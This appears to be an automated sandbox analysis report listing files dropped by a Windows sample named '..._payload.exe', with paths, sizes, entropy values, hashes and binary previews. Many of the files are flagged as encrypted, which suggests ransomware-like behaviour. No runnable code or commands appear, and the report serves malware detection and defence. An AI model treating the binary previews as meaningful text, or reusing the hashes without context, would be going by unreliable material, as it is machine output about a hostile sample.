                                                                                                                          Preview:regf..<%..NN...E..g@.5..=..G....N.-...7k....E.^...g..]...~...KU...v.....ej...PmO.N%......x4.T.wt6.z.....k.`..Uag..ne.fkM.,V. .......2.]`J....4A..@....8.>.%.k.M...h...! .H.`=N.(.....I*,...s.....}P:..K..r7..3N.f>.gzs.SS....Wx$T.?....0 ]X....i3..-/..........G&.g..>.5.2.& ..KU..(..Y.Q.....pd...~L$Q...e..z....H.o'...tQ.Wr/...f'..k3.......W..S.9=.<.Z.....=@..66....o;.../.[.1...K....j..=q.46.U6.....#...\..a...=X...t...u;)Zf...=.'(..tm..,..n.....K=&U.t.m.....0..}..>..+...S$F....$'..0yd;..-J....1..f.Q.o.f1.Mv..[..bYK,.....m..\.Vy.K.....-.hg.L....Z...`B...(2z...X=....^+@..'.;..R.L..dx.|.....%....J..p.e.aV._.j.Z.39..h.X.....3....A..y.v......}.Qu.#......2...k...V..[....r..':D..y..........@...B...l._&.p9H.\.r.=.e......V..@.*..~gT{j...6C...K.z.*...n...o]Z:1>...W..h...6.&.a...;.j..:ON.^kg..QQe.....`#..Z..r.....Gb'.T6....;.....".]S.8..!.pN.....n..gIP..0...3.C..@.|..k..6......]...K......F...y.Q.aXN.F........#...Y.|/zJ....d..E:....&4.J.L....6x..K:.m.

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.973954418206224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Llnnfk3+TBQEgKvGdqsoAKSP/SejuCAwOmEikfUDS1SNLWi19:LdfkOTBQEgsGdq/AHSejUmHkM21oLWi3
                                                                                                                          MD5:BD865E97B1A2DDBE47DD442883FE68B4
                                                                                                                          SHA1:FA54AA7F2AE2D5D065F05B94DF5F4E792342F982
                                                                                                                          SHA-256:61901FD9ADA6568C45C6ED838FA971C55B6B99270FB24F37BE42B6E844D26F57
                                                                                                                          SHA-512:564F885298DFF33358DAE585F09440839EC6EE5AC13B9624261D0634C32CD3ABDECBAA787ACFDA92A6C3645056FD920B5B63754F1A154462F9810DCCA01340EC
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf..O....<.... .....t-..-.Z.....a...s..Dk.F.r-.F~./R.=...cL.tY....n..1g........|....T..4.t_8..dm..=e..Bji.H.#tm...6N.v.....`.$."#.{.<.7..'Yj$.h."..X%.....:D.6q)..=...L}.....]z.f.#.3..E.>J&...y...'...l.E_..".S..hu...3..D.UoY...B..[...^...R....(.b.V..G..}V..\,0}f.g.J.i.79.b..8..:...,..B..@.o........K....3qBto.8(7 ...R}"....H.\..rE.Pj..^.AJ.......W.O.D.A........K.N..J.+..f}....l....q12.T%...4......r.=.VP....>..|......`.Z.; .v.$.....`#...(....Z)....H_zI...lX.GC.Q. .<-....5<.l. =S..J..R. t%.[[#....G.(.z..Q.2.n.?~..Nf-(..@..A..6.T7).._.f...rU...H.. ...N.h..^..U.....<..>....U0......(E.;.....v.S`@..9..A.P}.^......m.m......o.^../}..S....)...E.Q.oi..8.o.p..C~...o...t.@..2{.XS.Hu.....y.]....Si'$d..S...>...C...u....:.....*.W...$l..)`...'.g"Lp.WB!...>.Ee.Z..3.@..6K....^...n.../9.|.r.N...V`P.t)....A....%...vP.-{a%8.......V...^.2.|..l*.i.f.L.q.Si.9;.d.K...Mp.....k..v.........J.Wg.......E..c.=.OA.0.l...}.....QD.l.ny........i.A...c]P..c.......r....~.C

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\LogFile_October_3_2023__13_9_20.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):615
                                                                                                                          Entropy (8bit):7.615825784533539
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:NTARONngiIo8Qs91p0rl3sB8KX8+IPleNwpGnwxw7rD4wsqXZ9hq5bTcii9a:TPECrlQ87leNwpi480pi9wbD
                                                                                                                          MD5:F1A535222514F200AEBC6432108F7749
                                                                                                                          SHA1:FA492CC871B60CF9AE49A5D6FCDA03590D025B70
                                                                                                                          SHA-256:ADD52F00472B3A31079E629C2EC4EA0887A69D1C2C17C3644EC4253CC9D08059
                                                                                                                          SHA-512:A6E7B0046B0431CE208AA8E1761702C6305906AC6B1AAFD5628182E6B6F941703937122B2EDDE7BE9940554013CA6DE1BA5F6326A77ECAA1A4BD946A44838678
                                                                                                                          Malicious:false
                                                                                                                          Preview:[000:.:..F;{ZC..@. <].P.U.>..}7......].C.a._)...|..b.}]...d.1*..C..........G..,...a..e..5:...,l..._..>y.$jYma./.z.!r.....).[W.Ht.l..j.ku.h.....8 .h.`{.@....l....2...4.p..2:..?..p.>'%.........g...G..Q...A.D..C];;b..k..{_.r?".65W..*..]......3.X.....#Q...3...H{.I.>F.b+........N..|7./x.OaA.....i#Z.N.e....wk.....2........X.~..s.P....'{...W;.....wjF..g.T..br=..Y...'..j(.u.Y.lZ.A..2../.i.....).Q.R...|....u;.c....<.S...H.V...r_#-1..gL\GCm.FB:.a..$......0`R..b..A7C....D..3..d.eS..mV..o..!....!..N#........XB...............[.{phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8547662
                                                                                                                          Entropy (8bit):5.20506064397715
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:zQ38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKO0:SF1qd/LKN0
                                                                                                                          MD5:0CDE057F283250FCBCF341409C09A23B
                                                                                                                          SHA1:832D115AB3ADBD21587E729BA24C0E85BE5D87D1
                                                                                                                          SHA-256:B50E068C054BFBA22C4D5B32964600A6830F7FD78040F03E9E9177892C0416E4
                                                                                                                          SHA-512:76A22571A30A3CB771CA8C9C2614B3931AA7C11F6A0BC631E20D5E61D41006ACA171EA5EF2F3DA32B8F50039318709F94AF76FB822723D9C2B1B14766100A823
                                                                                                                          Malicious:false
                                                                                                                          Preview:Micro.E..?..B.....b.3T....7.Y..>J1.RUx..r#.*C....L......O7h+5.......E..$J..q_.}.k3...1.T.N......`p..h./`.4....6n$.f...".X|..51...ur....H....!....B.6.S*/J.y(6..4.|...`...O....9....YxW...k.7...6...]......8....c..sX.xF.a......T:h].n2..aK..4^....2.,J...jn...;...dT...sx.B..G.,.0..z.-.U..JLO..J.|'.......`:=.T.&.2...c....n......L.8..-.d\...7...g...D.n.i.xU...|sIpQYwQX{~.m@...T..9D.K.&(a.G..BM4ju2..-.9.P.rn.B.>....p3....S.../x.;&\....u,O.Jk..p^.V...iE..,,.t........Ny..~...G.......f..m.t&...=..`....H.H..!.=l.q.5.R.=...~..k..X^q....}..[.W..b......L....jN.E.u*%w..g`...bO....U....c...U..../....../|.2[.....+.*....8......G..V..I. ..;.m.+.....d.....14C..p.d..l4..}.....H.F)........ed........G..c..........Uyt...@.)!..z...@=.....#H..(.....U.=...7..ms.=...,....w..y..<......y..T..;...`.}2aj...AL.Z/N..5..e3u...~ ...k.....T..*..OAUS.....,...2.....@4J..~.S.4...DD.X_.h.pl...n..r...Z....%..<.,.59z...!ad...f.F..A..Z.OM..xG.V.zl.l^.H.../7......z...,..6..G

                                                                                                                          C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8547662
                                                                                                                          Entropy (8bit):5.205148054528959
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:N2sp38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOz:N2slF1qd/LKNz
                                                                                                                          MD5:036C76D8B5340106786723DB5E7A9A6F
                                                                                                                          SHA1:DB22BDF980158D7AEA19A474ECC1B8E2471327ED
                                                                                                                          SHA-256:0DEB5AF64E5909C001B645A590CEDA54A5D0554683A22D004AC5204927EB710C
                                                                                                                          SHA-512:9CCE1A52A302C9F8BA97F1D10419BBE37432F21DF1DD4EE7B035FA5D22591B485BA21994DBBBCDEE9C23EBFA9C010D93506AAAE735E408B1F58D2DD21CB1B864
                                                                                                                          Malicious:false
                                                                                                                          Preview:MicroQ..~...k.^..Iy...}.c=...H.P).<..}6............5.......+&J[BI..E.z.a(.S...jGX...$.....c,.....r.........RP.X.3.%.......O-0Wh..R0>`..wa..._.D.Ty.(>.uf.a....^.eS../...8.C...'..x.-.l..%:B5.!_D......_W...X...<@XY~..T.....k<p.r.<........f.r$.&g(....jN...tKACO..D.v..].Ox..A+a...F.......].?.Vs ."g.=..:Y....f.........G..T.i....w...c|G.X..}.k......5..Q...E.."..T.&............Wy..akA.L.>.T.2c..S.W3eqY..*.....$...nV}.Z.6`f.L.yN[I._..$'.n}c.~&....W.35...mF..>.q.....1y-.R{....:......n..{....!:g...8t.y....Rd&.#~V..j..8....cj.y.<...U$...s.h...4<..N............]..@...-I.L#.-:I.M2.8i.%......n....-..I.K....e#.....4<U..._.\...v.....v..~>..W.!aj..b8..........G`..J......5.o"gLX.....&I..H3..7D.....2.9,'.7..Qq.>.....`....A...y..P..q...s.3.J|...$.*. 6.Z........Xt.%{{.F&.....{....5=...c.4..].-:g...'....L.J]......(.eY......A......P8..,...7.&..f1L.=...U..zL_..t. 9xlUa...kL..i..h.....]..N.@b....`(j........._...@.=x.j..(..J..H.\r+G.)a...../.|......(\..H....r

                                                                                                                          C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1192270
                                                                                                                          Entropy (8bit):5.662184791506967
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:x4NurkxTC6GaVJQ4aKVmaS4aMz8Pg3lxJo2cvXtQ:x+7xTBaKVzaYcAqtQ
                                                                                                                          MD5:E2A81FF720A50D5EDEE0022F8C132122
                                                                                                                          SHA1:7E25EF27D4C7E892A255CAB6DE7E3CC917E1FBD9
                                                                                                                          SHA-256:692A3F9D1CE7D38C6177B5CCC2E6E89E2252918B5B0F12B8F577CCD41A584F79
                                                                                                                          SHA-512:657A562458DC47C633005A7A2F08B18D3AA86E663342B0036B60335EAA8F5C46DE491E00F78654AF46B66BD9154F392FBC1E8E94C857C72C3E56D0A44F0C8DAE
                                                                                                                          Malicious:false
                                                                                                                          Preview:Micro..6\...-.....O'..."..Y#.)..]8K{...|....9|l2..=&.rri..Ki..-.d...s.Ck.e.[.$..?...3.Q...._i..~.'.5xCf./h.N.P..op.8.cY..].z...0..L..~.].M7..DX.{......n57.*F.v<...3x....H.....d.I.../E.`.a..w..S....$..@..^+.q...gA8.,.]..E....i+GC..l...../z..{.zu...!.).........8.B........^AG^...n.K..?....=.u......e.M......a...}X...X.J.E._n.N....`...KW.."0e.......J.$..t..^..I*R...D.....S..w.P...$..e.G>...+SVWr....."...vv.......=L.e1g(.9.`...4.....c..K..C..i.......p..]..2...l.BD.@....t... s! +?..............3.DVJ)....{LH.L.Z^...@Fb..4c~...j......"..`n.S.V.Ed.Y.C..|.L...&...,F..p....3.`s..9.|...G.w"/......:.4$....m%....M....J......s.].."C.Gr1.....x4.*2..;.w.D....6.....k{....o1....a.E..g...J...Z..{j.a...3.<}...Q....)t.z..t....a..7Q.].]...a]*.z.`.*W.l.q!T......H.>.n......E...K.S.kf.w.+..Lk..8y...V...m=u.k..U..|............. .x..'../..^..h.......fJPR...2...b..FY..%.....S....{.k.....2j.Z.5.G..xn....D...).p.;....D.\.......8!.J... .u.. ...pX..tV.m..s..;5K..*,.

                                                                                                                          C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1192270
                                                                                                                          Entropy (8bit):5.662498166736629
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:ADtQxVwpAksOMpoJQ4aKVmaS4aMz8Pg3lxJo2cvXtp:ADYVwpJMqBaKVzaYcAqtp
                                                                                                                          MD5:6F3E9216DEE10DBFEA0341EF3093FB7D
                                                                                                                          SHA1:A737E0E237A6C6BD84F74FE898DAEDEA9BA8608A
                                                                                                                          SHA-256:21EF31EA5D6D44FBBC720DBCC5AD70FE37C48C87EA4BBA0ACD80DE5AA4F47C79
                                                                                                                          SHA-512:4CFC529A2547EF03E470BE10CED7105C47F2BA9DB77CC208B2E995FBDBCF83E377194C6DAF2B0E30155C305C077DEF68B3418EDF96ED43E1361E6CA118AABC2B
                                                                                                                          Malicious:false
                                                                                                                          Preview:Micro8l;.r+<.....$X>....$....D..ES....#u.. .....N6..!.....&..o]i.6.....Iz.G.A]\...PB..H.D..k.`F..{&..C!....*.....$...`..<...rPAKgn.....Y..{vQk[.M\.|..h.<.hm.(c..+....Q......l...0...Myv#....{9-^7....z2!...8..9.......j..N.3....wwc.....4...~...D.i.BY..j..k3..#.{..!.....)(.iR.Z.4..y....R...../.*.f.z...Z..C..7.8.9.`.\.c.W...z.N..m.3....&0....^..6.Ad^{L...z..Pz........p}IZ....K3.~~...F......-Y0..'P.....2%.f......X.l$_.....o....v.)....W.7..X6.........;2a......4...N!X.{.V..wI..`rR..z.F4.oix2|.....t... .$B(.O%.Zm.N..3...mp...j"s.7...#.7s..Q...O..W^7......p.Y.....).!7. ..\a.....dKRFu.a|....#.P...jt........I4$S..2....w.7eE......W>.,."#.H.B[@a.[Pg...A.9....q *......\..".V..0....;.z.;Wz.N....i...D.2'.....]j....|.O...|8.....lp......km...!.Y....NN...o...f......t.8gR.....{...vq.R`...9.S...[Oq.....?pAu..&..w...D...t6'l...{.......b.4'LIH.l..:....r(%.Sm.. ..f..n..&D.}..Ya5..u.../..j`.A.zV....2.]t.Nu......u....8......h..:.tSG.]C...w.. ..N<S.:1.

                                                                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):24210
                                                                                                                          Entropy (8bit):7.9917209885167075
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:384:eQAjKuFY4/6hWUM6gzjD5GBKpP11cyTVtUpOAJ5vUBkR4Bl8Ubl7fqky8CVvNMrj:eQxuFt6h66UjD5GcpPLcyTVtUpOAHMBt
                                                                                                                          MD5:057BB02B71E36FBA0BA4F41CF1F7D9CC
                                                                                                                          SHA1:F5AED7082554C29DDF669BBEBD9721837147B33A
                                                                                                                          SHA-256:48A686AB4DE5CD17059A49B7194984179D625B51475FF0C33351A8A10E4B5A69
                                                                                                                          SHA-512:5A2572C705720128638D72B8B2225958DBAA38AA9A28469E6943FA6E8F8F45A7F53720F4C79A40BB98F5AB2A786055AAD620F7FAE0FF8FA959CDB1F828475C9C
                                                                                                                          Malicious:true
                                                                                                                          Preview:03-10X....g\..\LJ....h@...v.C.b.E.~.....4..{...!....i.K.{.f(.j)..[....C...V...t."..1...w.....iN.2e.z....D....'....".Kc...H..._X{]H...........l...w4R..HVg.87.).W..Yf..V9`....V\H...;U...">...#.......Z$.A...O.N....7....~..}.y.r.8..;lF%N.S$]...4 .,Ec?.X.b...?].X.4)..4hl...].1k.J.....noO..H.^.....].5.k.. .~..Xji..W.)....K..y.O.Tr..c...N....=....*..r..,........E..$..H.N.....6....)+.f.0...P..m.S.....A0;E4X7d .."......PF.G:..~.FC.N...N].7..V.8....M./.5.@.xx..6...].......2.....q.1....=...~.D...a...I?.@..<`Wc.c.2.}T.Nk.A...f...U....."_.J..y.....7..*.....'X.E...\)`..l...9.l....{YV..,.w2.....\.V....B_.V.8.....u....5...Y..7.......x...v}......8...x...ZPg..N..`......."..m..?..}....>....7 G.OG... ..O..G..\....a.\..a...S.W......B.^.t8~.o....A....9.8x.(....J b...?.$....f?..5.A...n..@..h....YP.*zQ8$..A[.g..X9.!4..9ZRk{._.U.B.B...3.8.....%..|.Y4SS.hq>....Xu....4.`....c.].d..L..$..MH.......|e<Y.......-.....2t.nZ...".\At..y.-5....3J'...n....4..w-/.@

                                                                                                                          C:\Users\user\AppData\Local\Temp\wct3D66.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1601198
                                                                                                                          Entropy (8bit):7.987447791414598
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:jIsTqZ70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUf:jIz24gQu3TPZ2psFkiSqwozm
                                                                                                                          MD5:76515A56AE9CAAD2DB57BEE594C3A926
                                                                                                                          SHA1:34207DBB219A28B24B11980932BCC073446CA9E2
                                                                                                                          SHA-256:3AC489B0AAA7C352C0B124BFEC0AB532962FB77A4F70F64242F432444C6347B2
                                                                                                                          SHA-512:A1C967ED592B83E72FE74D00563D43F544A92546412B6454AA6D112DB790541C5ED1B24922F7CE3F0D9FB3F48744226D3C3F097B16B6AFA4A90F949BB35C8079
                                                                                                                          Malicious:false
                                                                                                                          Preview:MZ....P+..|....{.A.l.j.:..k.?z.......A?..}...M|"....,9.....m6..........)h@...l.....x..0..G.67...+...q.j.e.t&.t*g..].J.W,..V.B....7$r<....r......k!\T.$...zF.xf...>{D........?..l..~.O.S.0....5..`.^.9..s...1........0.u0.wm.......E.i.%:.!.(.:.$....H..u.....B.z;..%`...[............4.......8....4Q_*.v.Ae...A._.E.~...<..9Yv*..d..%.D....._D..T_..~.#.xh.!......&.......o]..l...MbD..$F)....:..c.Ur....J..oDN.I..r...wg..6./&,G.T..\.\5rsiA........{J(o;..'Z.z......rs. .b....C.......t.E.M.|<.@@...k.F._A.x.!E.I...@PO".w.hp..V....*.V.NWD.t.B1...H.y.v...V..QL..#....2.j.#E.qRxOe#..d.;A...+.K.{7..X.OQ..M.....[.).....`.[z..h*....A@..-t..*.z..'..l.Y...s. h/......y..@.&..z.3.'..X...xo.z {.P.k.g.I&.;.@J.6f./.H.V..y.2b.S.&...VmH...a#C-+..F./.Z...@......@..;..A.l...B<C8u.56.R.eq.Sj...P-........WP.n........Ek...6....Qfi....!...%..W*~...../x..z.q.8...Z.K3.k.....X..u.hJ.gk.1.._...;f....E>k.P...G...k.Y.....v.{r.#YiWP'..\.....5.U......X!"...W.m...Z..N.D.

                                                                                                                          C:\Users\user\AppData\Local\Temp\wct443C.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.9969931080654435
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:1M7p+MNxA1RK11ac7QsNFgxVgt/Y6Vb5z+5+wJGCl0SOYxdaZRIb:jMNss11ac7PrOVgt/TU5UCVXxdyRIb
                                                                                                                          MD5:C6AED58376525D692EECCFB51A13ABB4
                                                                                                                          SHA1:C195CCC7BF727518FE95BDF6A80D5DEB1540BCC0
                                                                                                                          SHA-256:0D7DA926F598D4DA1EBB1C72C2C38AA738D4F016208C1A13A49969244EB8BA4F
                                                                                                                          SHA-512:574C7F42A8831A5F45A7DFF7220208774FA259F2C011F292B5427ED2E3072E7CDCF08B4F89B345A1C3F35DC6C6CE332FA09C58E5B4F6DE66C9979CD03098534A
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"ram..7-..#.l..Z.f..E..0.E6.1QOfb..xZ....-..=...^wNM.(...qX....7{\.c.+...5...SO....jj..W......{.W..Q../l.v.jf.`.z.fx.....@..7..RZq$.`...0PvZ....^.&.V....;7.......k.[d..2p9..Au.8./yu...9...f.sm...|f..`8..t...r.k6.G.h.../j.......7....(.M.MK.#....X`...%.6.[.Cv).....=..NP...,..cxf6.\.f'.E+..`B.(`".M..SoE..[..U).5..&...Z.O=..s.jZ[._~..I5/>......n.j....S.ZjT...I.....@.of..;....c..,..#......./1.3...W.`..6....-tY&3.'3...gr.......M...r.....?|...W?.T.ut.6...:.{-A..+..>.f.,.$.U.3....'j...NYr...q...A..[Y.Ev.*/.:.o...i^HR.".Q..*..t...U...k..8.n.[*...M%..W.S.V .:..V....".J-.~.*.3|........@M....a.t..ED....*..c.Q.*.0.x..._. ...........j.......n..<.......M./.....2F....R[[q..].HAg8....X/.*.=......N<.l..nB..t.h?..........y......^RE.A.w"K....`. ~.a....h.1OQf.bz...x....8oM\u=X..6%=.....e..J.J...5..C.....c.hee.m.U.~...g....i....n.c).o.3,n...+`.e3W@..RH.O.nx.....f.Hq.A.4............$..X..(..[..l..@.....bS...%.M...y.3T?o.0.....V..o..7..#...F....^..H/...;.

                                                                                                                          C:\Users\user\AppData\Local\Temp\wct49A7.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.997102900259094
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MMOl4Br5TkxUN9lU25djMLJVCB7OUsO6HEIX7SW3MiVwBIPx:CmZKS9V7Ou8EIX5teBIPx
                                                                                                                          MD5:053A2DFFE138782F810D91F8D5B4F845
                                                                                                                          SHA1:74C1F1C57CB2CABB460A0B42B773FAFDC543532F
                                                                                                                          SHA-256:BDFBE44FE1749DCE816DA061BE9D44A8A4DEB4E98D344A3E581994F2B5CBA712
                                                                                                                          SHA-512:DBB572DD35D895713B9943388BC52965AF1649642BA2877D0907A8BDAF9A0168EEDB65AF8AB585D5E59E9DE8D9AEB993540C713A056EB0AA255DAB51FA6E84D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"ramP9#.....9P..Bp...Z1'...?G.+j...*.D...Bk.?..=X5....1.....Y3..._...<..........7_}@.&..g.Nr......C*.1..N...g|....=.T-...zl......Eu...?.2.....#....~.<Yw.a?w^T..w..vS4Q..JGM:U.{....j.........l.P.<q..._.M...m.Z!..xi...............s9>.D.....%D I...2wT.k./...L.L$.G7.......M$C..J*.DlT.#..W.Ab..|...9.y.i.1..N....d..On.K2mj..KJ..{.....".........2..Py.i..Y...;.<../Y9....8S...y6..;.YZ......-.$mV...r.z#Cu.L>...;.vh..=.S..k....s(h.Q....5...`.....|V.........`..v...38...n=.K.U.+...5.......zUa..........T]..6..#^.3...........d@.8....Z.....\..N.%v"...(s. ..Njl..u.`.2.rk-.....e...qe.W..YV..w..5.KO.....4.@|..........$:bje.ah.#...Rm.....EW..I.a.1-A......<.Y....1...\T..k...LB...x....P$..L.2.. .@.7..`?d..a_@.v.4O..8.Zq.....9X...=;.>X..<..j<|...6...i..(..~W...Q..R.L..fm...2bh...L..../..6.y.7.>..A..v......3..6VXB.[...((}.6.N.A....q.y>kXL..}u-..lp......W0.h..sH.&lO[T8.......nI..!+.....lokL..y....V.*...$...J6.Rs...G...pB..*.F....Y...YV.#'....z`..{.qU..9...2.....

                                                                                                                          C:\Users\user\AppData\Local\Temp\wctAB5F.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.99762408349614
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:rdXUGKnJAktTXUsDwFbuSzrY02SOL/cSwWcHiqKhkSBqap80Rp:pXUGiAiTXNwMmr8hcScIIamGp
                                                                                                                          MD5:4C0743AF377C4707D98478EEE77944E8
                                                                                                                          SHA1:D5DC63FC2F3FEF3481829DD99491FE4BCDAF8BA5
                                                                                                                          SHA-256:8F8F1845C04884B997477398272F058DC7670794E871AD741553A4AB7E9F5E27
                                                                                                                          SHA-512:4B2949B9E0A4D9D0A4872FF61F6F0C312392F06025FA9EC947A0A0F50A1AEE73B448203A241BDCBF95E20FED095A50AEBD21067565B1EEEFBE490A70AD620797
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"ram.Y..cik.^....E......Lw.N.S......IbB../<'...8..h.h.~......5.*6.B......9y#.jYBI.<...X)..=...s....j4..43G+....6.6Z....G..\....$]...2mzZH<...~.:..C]..T.....t....D....uC....A.C...>..;._..|..H....U8dI>..,..K.5..M[..........Z.._ X..a....:.%.K.G}......v.....Y..[...)..._...Ly2w2..sb..~..r,"?.....V..g...+c.m;$..'..........\S...f.o.d..{X:p...%..d..L.%AS.o..[..G6..?.1A.,Euhf-.9..(tT.S...s......$EvX8.. .{+...7lO.\4F....#...="g.R.w^...{.......*.p.@..X...W.r.$.@.:uv.Lfb...*.*e..[...c&.?....V4.Bg.p.....cW.:..hED6.5._[.......Q..^e9.k...2|N..c.T.m..Z..o..K....,|h;..B..f..y.3..V.@...E.]{......H#1.fh....t.&S.N..`..i.@.{...(HU."..X6...U2..+..0...~.M./..".w..Gd<..Nr.h...@........w_.|....H}g...dI...I ~..).....v.@.]....#.T.>..^........s.l ..p.T>...e........Q. .$!.t.V........k.a....c....,..j.HF.o...9,J..IU...v.."...u...X....%.....u.....yz^..<Hh..].L.w.xC.}*.....J..a....\.g.?...o.}N...].. .".o..>..}.{..Z...CH.#.({;......B..~..Y...u...b.U...R.u...K..8=

                                                                                                                          C:\Users\user\AppData\Local\Temp\wctDB2E.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65188
                                                                                                                          Entropy (8bit):7.996928043079858
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:hD93R3q7YNn/znoF6JE3X+tJz/7NQnhzP/CdKUlHvdBipzODNau3s7rpDiF:X3EYNn7062H+nQzPhSdMpzLu3s7rpDq
                                                                                                                          MD5:F15A38844C90FF1805B18FCDF4442C31
                                                                                                                          SHA1:D4486C45DC0215A9D0F121D3D2BC2A9E4516C625
                                                                                                                          SHA-256:5D44FEE52C9C4A36070F913ADFC0BC7940CB8B00F46E5977905098FFA7C4C9F4
                                                                                                                          SHA-512:D61ED904A3DA821DF9E4B92F573365371B8BEA5B8F06D64A4AD760EDADC329CFEB7C83600FD3C18C18C714CB43D44A290A95CB920B23CD2223DCFC251A4297D6
                                                                                                                          Malicious:false
